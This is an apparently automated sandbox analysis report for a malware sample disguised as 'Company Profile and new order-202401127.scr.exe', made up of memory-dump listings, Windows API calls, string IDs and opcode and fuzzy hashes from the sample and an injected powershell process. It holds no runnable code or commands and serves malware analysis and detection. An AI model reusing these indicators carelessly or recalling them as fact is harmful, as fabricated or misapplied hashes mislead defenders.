                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                            • String ID:
                                                                                            • API String ID: 3748168415-3916222277
                                                                                            • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                                            • Instruction ID: 85372f17a9103eb01fcdfd8a19690b8d052d76dd043ca16804f8a0d8951f02ed
                                                                                            • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                                            • Instruction Fuzzy Hash: 53017171200609BFDF309F51DD80AAB362AFB84750F540437FA047A1D5C7B98D52AE69
                                                                                            APIs
                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406660,80000002), ref: 00406435
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00406440
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseQueryValue
                                                                                            • String ID: : Completed
                                                                                            • API String ID: 3356406503-2954849223
                                                                                            • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                            • Instruction ID: 441e6d046e2572fd66e4c77006f0a98464fe89a944563537cf106c849ea921cc
                                                                                            • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                            • Instruction Fuzzy Hash: 4F017172500209ABDF218F51CD05EDB3BA9EB54354F01403AFD1992191D738D968DF94
                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,00403B36,00403A4C,?,?,00000008,0000000A,0000000C), ref: 00403B78
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00403B7F
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B5E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: Free$GlobalLibrary
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 1100898210-823278215
                                                                                            • Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                                            • Instruction ID: 6899552f53244e150386b1952d758f3f927a5bb415edc3c38dc9ad64461d36a3
                                                                                            • Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                                            • Instruction Fuzzy Hash: 59E08C3250102057CA211F05ED04B1AB7B8AF45B27F06452AE8407B26287B42C838FD8
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe,C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe,80000000,00000003), ref: 00405E42
                                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe,C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe,80000000,00000003), ref: 00405E52
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrlen
                                                                                            • String ID: C:\Users\user\Desktop
                                                                                            • API String ID: 2709904686-1246513382
                                                                                            • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                            • Instruction ID: eba18341e72c17137544591cfc51a7e4cac6184970473274e9d14fc4341c5a90
                                                                                            • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                            • Instruction Fuzzy Hash: 29D0A7F3400A30DAC3127708EC00D9F77ACEF16700746443AE580A7165D7785D818AEC
                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F9E
                                                                                            • CharNextA.USER32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FAF
                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                            • String ID:
                                                                                            • API String ID: 190613189-0
                                                                                            • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                            • Instruction ID: baa81b9806bcf2d0018ef5e19b9a589e3df5f1c452cb3fab7a363fd504aebd5e
                                                                                            • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                            • Instruction Fuzzy Hash: 87F0C231105914EFCB029BA5CE00D9EBFA8EF15254B2100BAE840F7250D638DE019BA8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2607619071.0000000004CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CAD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4cad000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b942f9e7d577e82f839bc25a5b6d63b957bdd25dd7632698d149a456eb042296
                                                                                            • Instruction ID: eba9b5ce968a7c53805e4ad48e56229782ce5c056108e5d4635a09b916e5189d
                                                                                            • Opcode Fuzzy Hash: b942f9e7d577e82f839bc25a5b6d63b957bdd25dd7632698d149a456eb042296
                                                                                            • Instruction Fuzzy Hash: 15214875604201DFCF05CF14D9C0B26BFA2FB88318F24C5ADE9094B256C336E926CB61
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2617362584.0000000009A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A10000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_9a10000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fvl$(fvl$4'eq$4'eq$tPeq$tPeq$$eq$$eq$$eq$$eq$$eq$$eq
                                                                                            • API String ID: 0-2961947741
                                                                                            • Opcode ID: 40ba9f356a077f350a9ddb27aa4a3b014f94e7bce94817789f17250ec0c9dd1d
                                                                                            • Instruction ID: 814e62aa9a68f2387bdc444cc9aac6510671bcdd367d81d5ecde398d47bdbc3e
                                                                                            • Opcode Fuzzy Hash: 40ba9f356a077f350a9ddb27aa4a3b014f94e7bce94817789f17250ec0c9dd1d
                                                                                            • Instruction Fuzzy Hash: F802E471B00224CFCB14CFA8C941A6ABBF6EF89710F14806AE905DB756DB31DD81CBA1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fvl$(fvl$4'eq$4'eq$4'eq$4'eq$4sl$4sl$x.gk$x.gk$-gk
                                                                                            • API String ID: 0-1689887990
                                                                                            • Opcode ID: 5fc7d79db9725c0553428e30c9df8db492d36e3f26786ae91a25c262214da84f
                                                                                            • Instruction ID: f3c1cf21d58147d462a3c19ffd6fe4c4101efeb82b66c6d155882c2e34c3e299
                                                                                            • Opcode Fuzzy Hash: 5fc7d79db9725c0553428e30c9df8db492d36e3f26786ae91a25c262214da84f
                                                                                            • Instruction Fuzzy Hash: BE9250F4A002149FDB24DB68CD51B9ABBB2EB95304F1080D9D9099F751CB72EE85CF91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fvl$(fvl$4'eq$4'eq$4'eq$4'eq$tPeq$tPeq$x.gk$-gk
                                                                                            • API String ID: 0-1328673682
                                                                                            • Opcode ID: 8f5d0e674b2a3e4eefe075a17411ed0b6749237343a9718e2813d6e45ee5fb95
                                                                                            • Instruction ID: 62d36331d0809b0b43681bc98c0684f42b1ed7789ebaf80c5f67d0d162247469
                                                                                            • Opcode Fuzzy Hash: 8f5d0e674b2a3e4eefe075a17411ed0b6749237343a9718e2813d6e45ee5fb95
                                                                                            • Instruction Fuzzy Hash: 8A82A1B0B002159FDB24CF58C991B6ABBB2EF85304F14C0A9D909AF752DB31ED85CB91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fvl$(fvl$4'eq$4'eq$4'eq$4'eq$x.gk$-gk
                                                                                            • API String ID: 0-4178824134
                                                                                            • Opcode ID: e7bda716df40c704f9984d53641632a48680b926be489b4397a1b31fa5287ebe
                                                                                            • Instruction ID: a91f9bdb3708487c83199ad69af15661191963980b00bf88bbabf560042cac74
                                                                                            • Opcode Fuzzy Hash: e7bda716df40c704f9984d53641632a48680b926be489b4397a1b31fa5287ebe
                                                                                            • Instruction Fuzzy Hash: 74E19CB0A002059FDB14DF69C591BAEBBE3EF85304F50C069DA05AF795CB32ED468B91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2617362584.0000000009A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A10000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_9a10000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$4'eq$$eq$$eq$$eq
                                                                                            • API String ID: 0-2942138008
                                                                                            • Opcode ID: 397fb6ddc09783de8a6f9b57496ea2148197e83905810f2fbbf69a10b8f9424f
                                                                                            • Instruction ID: c94bfe93f3950634695c6165655ebc21678fdd1b03a8542eaee4cabf77ea8095
                                                                                            • Opcode Fuzzy Hash: 397fb6ddc09783de8a6f9b57496ea2148197e83905810f2fbbf69a10b8f9424f
                                                                                            • Instruction Fuzzy Hash: DC020431B002458FCF25DF69C95176ABBF6FF85720F1480AAE825CB296DB31D941C7A2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fvl$4'eq$4'eq$x.gk$-gk
                                                                                            • API String ID: 0-1233961443
                                                                                            • Opcode ID: 920ea63e251841fcce89b1f96bdcad86720023f8f47d079ebde2888cf478b58c
                                                                                            • Instruction ID: 66422aca0019e8dfc4d55d9c739bcd7a0f4b778ed8805a9240875cba043d9488
                                                                                            • Opcode Fuzzy Hash: 920ea63e251841fcce89b1f96bdcad86720023f8f47d079ebde2888cf478b58c
                                                                                            • Instruction Fuzzy Hash: A6C17AB4A002059FDB14DF69C590BAEBBB2EF89304F14C069E905AF755CB32ED468F91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fvl$4'eq$4sl$x.gk
                                                                                            • API String ID: 0-659791527
                                                                                            • Opcode ID: 263b4f099691a80434f902a5579e5a4111226d7dd2929a98d717273b7ff05af4
                                                                                            • Instruction ID: 41dce99fde7b66462c4475d23a12e2b239e635feea09cf6584e8ec950ead36ba
                                                                                            • Opcode Fuzzy Hash: 263b4f099691a80434f902a5579e5a4111226d7dd2929a98d717273b7ff05af4
                                                                                            • Instruction Fuzzy Hash: 20124EF4A00215DFDB64CB18C991BAABBB2FB95304F10C1D9D909AB751CB32AE85CF51
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fvl$4'eq$4sl$x.gk
                                                                                            • API String ID: 0-659791527
                                                                                            • Opcode ID: feee197fd509269597a033ef832ed67c2a0a75f2445aa7ec235cbf7150db9884
                                                                                            • Instruction ID: f29bedcd6b83a684415b5646bfed2d793f9b9a21ce024a93268e8d33c4642f05
                                                                                            • Opcode Fuzzy Hash: feee197fd509269597a033ef832ed67c2a0a75f2445aa7ec235cbf7150db9884
                                                                                            • Instruction Fuzzy Hash: 9FE15EF4A00215DFDB64CB28C991B9ABBB2FB95304F1081D9D90DAB751CB32AE85CF51
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$x.gk$-gk
                                                                                            • API String ID: 0-1873619579
                                                                                            • Opcode ID: cbf90dcabbb61d1870a4b95a3ec510225f7da1591f3890be0e9468382d166e03
                                                                                            • Instruction ID: 748b4b891659efaea00c919546486966191a6388f260e3fccfc6379cb41a7204
                                                                                            • Opcode Fuzzy Hash: cbf90dcabbb61d1870a4b95a3ec510225f7da1591f3890be0e9468382d166e03
                                                                                            • Instruction Fuzzy Hash: BD5250B4B002159FD724DF18C991B5ABBB2EB84304F14C099DA09AF752DB72EE85CF91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$x.gk$-gk
                                                                                            • API String ID: 0-1873619579
                                                                                            • Opcode ID: 75d43c16fae0c98219cd0c1dc9f0d10d47fd5114aea45209f666d73b3b52065c
                                                                                            • Instruction ID: e43fad6e148350b76fe4f495d22e0cf2ae230ded08004d2e90225c690054951e
                                                                                            • Opcode Fuzzy Hash: 75d43c16fae0c98219cd0c1dc9f0d10d47fd5114aea45209f666d73b3b52065c
                                                                                            • Instruction Fuzzy Hash: 2B4251F4B002149FDB24DB18CD51BAABBB2EB95304F108099DA099F751CB72EE858F91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$x.gk$-gk
                                                                                            • API String ID: 0-1873619579
                                                                                            • Opcode ID: 05af52434df1350201365edd664dc582fefb1de8743562f2d0c187991c159284
                                                                                            • Instruction ID: 86bd208fe5c5ff44e8bdc7fdf6bbba0f26463b91724390b53bea1428c608c4c9
                                                                                            • Opcode Fuzzy Hash: 05af52434df1350201365edd664dc582fefb1de8743562f2d0c187991c159284
                                                                                            • Instruction Fuzzy Hash: 78224EB4A002159FD724DF18C991B5ABBB2EB84304F10C099DA09AF752DB76EE85CF91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$x.gk$-gk
                                                                                            • API String ID: 0-1873619579
                                                                                            • Opcode ID: abf244f487e557567449105f336f42e3578b8d05d5629772586150803c8031be
                                                                                            • Instruction ID: 7ce7e89559250c654035f610ee17f7c1010df2eece87b5e77930cebfe0c93a8b
                                                                                            • Opcode Fuzzy Hash: abf244f487e557567449105f336f42e3578b8d05d5629772586150803c8031be
                                                                                            • Instruction Fuzzy Hash: F11241F4B002149FDB24DF58CD51BAABBB2EB95304F108099DA099F751CB72EE858F91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $eq$$eq$$eq
                                                                                            • API String ID: 0-177832560
                                                                                            • Opcode ID: 7b35fb399fb730895245c343f7e15e4b561446a816a12c1854f869e2bbff9d6d
                                                                                            • Instruction ID: 6bde8f1bfcd6b34b548ebaa32f9eea787b02f0575e3cfe0f025c47a33d0f0264
                                                                                            • Opcode Fuzzy Hash: 7b35fb399fb730895245c343f7e15e4b561446a816a12c1854f869e2bbff9d6d
                                                                                            • Instruction Fuzzy Hash: 43412BF2B001669BCB64DE69E84026FFBB5AF85310B14C56EC815EB345DB32DA11C7E2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $eq$$eq$$eq
                                                                                            • API String ID: 0-177832560
                                                                                            • Opcode ID: 537ba9ddfe99cdcf0f35f1bc1202893c36a19cb9e15f8b6f4c6691ed24d13838
                                                                                            • Instruction ID: 4bd94e3a3c94acd2cff6a1dc740d006b49a6bc2f0de888d0c296d68e1efa90b6
                                                                                            • Opcode Fuzzy Hash: 537ba9ddfe99cdcf0f35f1bc1202893c36a19cb9e15f8b6f4c6691ed24d13838
                                                                                            • Instruction Fuzzy Hash: D02147B27102869BDB38D96A9860B27BF969BC1315F34C02EEA05CF681DD35CB418361
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2617362584.0000000009A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A10000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_9a10000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$$eq$$eq
                                                                                            • API String ID: 0-3012014280
                                                                                            • Opcode ID: b8d32f17c731e4d96db0fbba32a9d1898314d4de02495eba1fc1b109fdd12ff9
                                                                                            • Instruction ID: 3d700d22c363311dcc036176a556ee4cbbe2ee1f419d125814e733c5594eb90d
                                                                                            • Opcode Fuzzy Hash: b8d32f17c731e4d96db0fbba32a9d1898314d4de02495eba1fc1b109fdd12ff9
                                                                                            • Instruction Fuzzy Hash: 4421B231A00205DFDB34CF69D580B66B7B9BF44B61F08817AEC2987159E735D844CBAA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fvl$(fvl
                                                                                            • API String ID: 0-433520029
                                                                                            • Opcode ID: cb9c7b8e94af8b8e5a592f646437627f35770e74f87ac45637fc66c2f088e7a2
                                                                                            • Instruction ID: a20ea467fed76c1046b9897c3073908f3e6e61f19d854c23b95f8c1d8a377360
                                                                                            • Opcode Fuzzy Hash: cb9c7b8e94af8b8e5a592f646437627f35770e74f87ac45637fc66c2f088e7a2
                                                                                            • Instruction Fuzzy Hash: 5E919DF4A00205DFCB14DF69C591BAABBF2EF88314F148069D905AB755CB32EE45CBA1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $eq$$eq
                                                                                            • API String ID: 0-2246304398
                                                                                            • Opcode ID: 71572e4125b2cca74bcb65ad76b53a99ed4ac654579bdf14e53a1a1fb6800ba8
                                                                                            • Instruction ID: 8cd9777121e8cc6018b8d73986fef2f049a2a45833c4f6197a71b669289dd6fd
                                                                                            • Opcode Fuzzy Hash: 71572e4125b2cca74bcb65ad76b53a99ed4ac654579bdf14e53a1a1fb6800ba8
